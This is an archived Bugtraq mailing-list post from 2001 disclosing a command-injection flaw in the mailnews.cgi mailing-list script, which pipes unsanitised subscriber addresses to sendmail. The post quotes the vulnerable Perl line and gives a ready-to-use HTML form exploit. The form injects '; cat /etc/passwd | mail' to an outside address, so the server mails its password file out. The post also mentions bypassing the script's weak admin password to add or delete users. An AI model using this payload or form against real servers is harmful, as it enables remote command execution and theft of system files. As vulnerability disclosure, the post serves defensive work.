[19277] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CGI - mailnews.cgi vulnerability...

daemon@ATHENA.MIT.EDU (Kanedaaa Bohater)
Mon Feb 19 18:33:04 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.BSF.4.32.0102182158240.35632-100000@ac.pl>
Date:         Sun, 18 Feb 2001 22:04:54 +0000
Reply-To: Kanedaaa Bohater <kaneda@AC.PL>
From: Kanedaaa Bohater <kaneda@AC.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
adam@malysz.pl' and use subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :	Kanedaaa
	kaneda@ac.pl


***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
		Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
kaneda@ac.pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..

home	help	back	first	fref	pref	prev	next	nref	lref	last	post